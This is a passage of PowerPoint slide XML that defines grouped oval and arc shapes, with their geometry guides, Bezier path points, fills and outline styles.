                    <a:gd name="T3" fmla="*/ 5033 h 21600"/>
                    <a:gd name="T4" fmla="*/ 21006 w 39208"/>
                    <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="39208" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="39208" y="11629"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35239" y="17840"/>
                        <a:pt x="28377" y="21600"/>
                        <a:pt x="21006" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11015" y="21600"/>
                        <a:pt x="2328" y="14748"/>
                        <a:pt x="0" y="5032"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="39208" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="39208" y="11629"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35239" y="17840"/>
                        <a:pt x="28377" y="21600"/>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4" name="Arc 1378">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E009C11D-8E5B-7A4C-82F4-71EB11D6D3FF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="850" y="2048"/>
                  <a:ext cx="40" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20955 0 0"/>
                    <a:gd name="G1" fmla="+- 0 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 38927 w 38927"/>
                    <a:gd name="T1" fmla="*/ 11982 h 21600"/>
                    <a:gd name="T2" fmla="*/ 0 w 38927"/>
                    <a:gd name="T3" fmla="*/ 5239 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20955 w 38927"/>
                    <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="38927" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38926" y="11981"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34920" y="17990"/>
                        <a:pt x="28176" y="21600"/>
                        <a:pt x="20955" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11043" y="21600"/>
                        <a:pt x="2403" y="14854"/>
                        <a:pt x="-1" y="5239"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="38927" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38926" y="11981"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34920" y="17990"/>
                        <a:pt x="28176" y="21600"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66915" name="Picture 1379">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4425664-7C47-8442-8015-215BBBCEF99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937" y="1600412"/>
            <a:ext cx="1188424" cy="75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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66916" name="Group 1380">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7240E34-CA11-FE41-9EEC-7B5E50921B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3226352" y="1811159"/>
            <a:ext cx="1800067" cy="1622595"/>
            <a:chOff x="1358" y="1894"/>
            <a:chExt cx="2981" cy="1793"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66917" name="Oval 1381">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C8048FA-7606-7041-847F-D0A8D728DBAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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8" name="Oval 1382">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{618FBDB2-14B8-5548-99E6-2DB2B7F341F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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9" name="Oval 1383">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69A87C09-0E25-3047-8667-3C1077F27F56}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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0" name="Oval 1384">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{751890CE-A031-0646-8443-74BC9CAAA9E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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1" name="Oval 1385">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C0A8C57-B8D2-0746-BC47-DA2D0808ABE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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2" name="Oval 1386">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A102FCBB-D3DF-B947-892E-AEA7A1FA8750}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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3" name="Oval 1387">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD60268C-461C-C141-B8BA-B7E22D0F7D85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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4" name="Oval 1388">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1704AF23-4F17-A648-917E-20EA4B5B8005}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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5" name="Oval 1389">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1F94B70-F9F8-B447-AAF5-84BF57B6399F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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926" name="Group 1390">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A46905FD-B823-2A45-9995-3AB6B6C5E67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953529" y="1904649"/>
            <a:ext cx="2410124" cy="1678055"/>
            <a:chOff x="1358" y="1894"/>
            <a:chExt cx="2981" cy="1793"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66927" name="Oval 1391">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3808B427-E658-534A-A1A1-BC210C389506}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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8" name="Oval 1392">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98B19853-BD27-474D-93FE-5EFD01B8F7A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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9" name="Oval 1393">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6BCEB9B-44E9-2B48-A4D3-FBB6EBFB8697}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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0" name="Oval 1394">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{413D4F81-3F28-CE47-BF50-8FA5438B3F20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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1" name="Oval 1395">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056E96EA-05B2-A849-B81D-12AD3BEAEB20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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2" name="Oval 1396">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A341836F-2BB7-7347-9292-653A330ADBD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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3" name="Oval 1397">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9C0A35A-DC5C-6544-8898-60E4D3C0A53F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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4" name="Oval 1398">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92D8448D-129E-DF49-B15B-96103B9B9D34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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5" name="Oval 1399">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3993F3D5-AA0C-6841-9455-166249D1E856}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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936" name="Group 1400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC2D9A2A-4895-D245-9151-AAFCC34CCD46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4986804" y="1934755"/>
            <a:ext cx="2389525" cy="1706577"/>
            <a:chOff x="1358" y="1886"/>
            <a:chExt cx="2989" cy="1810"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66937" name="Arc 1401">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CBB6372-D43B-8445-AEA9-D3E723744544}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2404" y="1886"/>
              <a:ext cx="1247" cy="375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 20666 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 0 w 40985"/>
                <a:gd name="T1" fmla="*/ 15316 h 21600"/>
                <a:gd name="T2" fmla="*/ 40985 w 40985"/>
                <a:gd name="T3" fmla="*/ 14272 h 21600"/>
                <a:gd name="T4" fmla="*/ 20666 w 40985"/>
                <a:gd name="T5" fmla="*/ 21600 h 21600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="40985" h="21600" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="15316"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2766" y="6218"/>
                    <a:pt x="11157" y="0"/>
                    <a:pt x="20666" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29769" y="0"/>
                    <a:pt x="37896" y="5708"/>
                    <a:pt x="40984" y="14272"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="40985" h="21600" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="15316"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2766" y="6218"/>
                    <a:pt x="11157" y="0"/>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8" name="Arc 1402">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED9F54B2-C896-F242-B1E1-CC1DBB469A7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2412" y="1893"/>
              <a:ext cx="1232" cy="368"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 20651 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 0 w 40951"/>
                <a:gd name="T1" fmla="*/ 15269 h 21600"/>
                <a:gd name="T2" fmla="*/ 40951 w 40951"/>
                <a:gd name="T3" fmla="*/ 14220 h 21600"/>
                <a:gd name="T4" fmla="*/ 20651 w 40951"/>
                <a:gd name="T5" fmla="*/ 21600 h 21600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="40951" h="21600" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="-1" y="15268"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2781" y="6195"/>
                    <a:pt x="11160" y="0"/>
                    <a:pt x="20651" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29734" y="0"/>
                    <a:pt x="37847" y="5683"/>
                    <a:pt x="40951" y="14219"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="40951" h="21600" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="-1" y="15268"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2781" y="6195"/>
                    <a:pt x="11160" y="0"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66939" name="Arc 1403">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FAA9F96-DFCE-2842-91C5-C3D444003896}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1662" y="2081"/>
              <a:ext cx="766" cy="446"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 392 w 33007"/>
                <a:gd name="T1" fmla="*/ 25698 h 25698"/>
                <a:gd name="T2" fmla="*/ 33007 w 33007"/>
                <a:gd name="T3" fmla="*/ 3258 h 25698"/>
                <a:gd name="T4" fmla="*/ 21600 w 33007"/>
                <a:gd name="T5" fmla="*/ 21600 h 25698"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="33007" h="25698" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="392" y="25697"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="24347"/>
                    <a:pt x="0" y="22975"/>
                    <a:pt x="0" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="9670"/>
                    <a:pt x="9670" y="0"/>
                    <a:pt x="21600" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25631" y="0"/>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0"/>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0" name="Arc 1404">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B956FFCE-2DBD-2344-88AF-19C4784F8EBB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1669" y="2088"/>
              <a:ext cx="755" cy="438"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 396 w 32968"/>
                <a:gd name="T1" fmla="*/ 25717 h 25717"/>
                <a:gd name="T2" fmla="*/ 32968 w 32968"/>
                <a:gd name="T3" fmla="*/ 3233 h 25717"/>
                <a:gd name="T4" fmla="*/ 21600 w 32968"/>
                <a:gd name="T5" fmla="*/ 21600 h 25717"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="32968" h="25717" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="395" y="25717"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="24360"/>
                    <a:pt x="0" y="22981"/>
                    <a:pt x="0" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="9670"/>
                    <a:pt x="9670" y="0"/>
                    <a:pt x="21600" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25616" y="0"/>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0"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66941" name="Arc 1405">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D46F79A-8DD7-A041-9B5A-A95BAA081EA1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1553" y="3120"/>
              <a:ext cx="773" cy="345"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 384 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 32097 w 32097"/>
                <a:gd name="T1" fmla="*/ 19262 h 21984"/>
                <a:gd name="T2" fmla="*/ 3 w 32097"/>
                <a:gd name="T3" fmla="*/ 0 h 21984"/>
                <a:gd name="T4" fmla="*/ 21600 w 32097"/>
                <a:gd name="T5" fmla="*/ 384 h 21984"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="32097" h="21984" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="32096" y="19261"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28886" y="21047"/>
                    <a:pt x="25273" y="21984"/>
                    <a:pt x="21600" y="21984"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9670" y="21984"/>
                    <a:pt x="0" y="12313"/>
                    <a:pt x="0" y="384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="255"/>
                    <a:pt x="1" y="127"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="32097" h="21984" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="32096" y="19261"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28886" y="21047"/>
                    <a:pt x="25273" y="21984"/>
                    <a:pt x="21600" y="21984"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9670" y="21984"/>
                    <a:pt x="0" y="12313"/>
                    <a:pt x="0" y="384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0"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2" name="Arc 1406">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08832A36-5641-E344-B3F8-1685F8207AB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1560" y="3120"/>
              <a:ext cx="761" cy="337"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 386 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 32039 w 32039"/>
                <a:gd name="T1" fmla="*/ 19296 h 21986"/>
                <a:gd name="T2" fmla="*/ 3 w 32039"/>
                <a:gd name="T3" fmla="*/ 0 h 21986"/>
                <a:gd name="T4" fmla="*/ 21600 w 32039"/>
                <a:gd name="T5" fmla="*/ 386 h 21986"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="32039" h="21986" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="32038" y="19295"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28842" y="21060"/>
                    <a:pt x="25251" y="21986"/>
                    <a:pt x="21600" y="21986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9670" y="21986"/>
                    <a:pt x="0" y="12315"/>
                    <a:pt x="0" y="386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="257"/>
                    <a:pt x="1" y="128"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="32039" h="21986" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="32038" y="19295"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28842" y="21060"/>
                    <a:pt x="25251" y="21986"/>
                    <a:pt x="21600" y="21986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9670" y="21986"/>
                    <a:pt x="0" y="12315"/>
                    <a:pt x="0" y="386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="257"/>
                    <a:pt x="1" y="128"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21600" y="386"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="B6C7C9"/>
            </a:solidFill>
            <a:ln w="22225">
              <a:solidFill>
                <a:srgbClr val="6C8F93"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66943" name="Arc 1407">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F97E969-F270-A747-9AB3-0FB0D4FE3812}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3626" y="2103"/>
              <a:ext cx="584" cy="427"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 4470 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 0 w 26070"/>
                <a:gd name="T1" fmla="*/ 468 h 31631"/>
                <a:gd name="T2" fmla="*/ 23599 w 26070"/>
                <a:gd name="T3" fmla="*/ 31631 h 31631"/>
                <a:gd name="T4" fmla="*/ 4470 w 26070"/>
                <a:gd name="T5" fmla="*/ 21600 h 31631"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
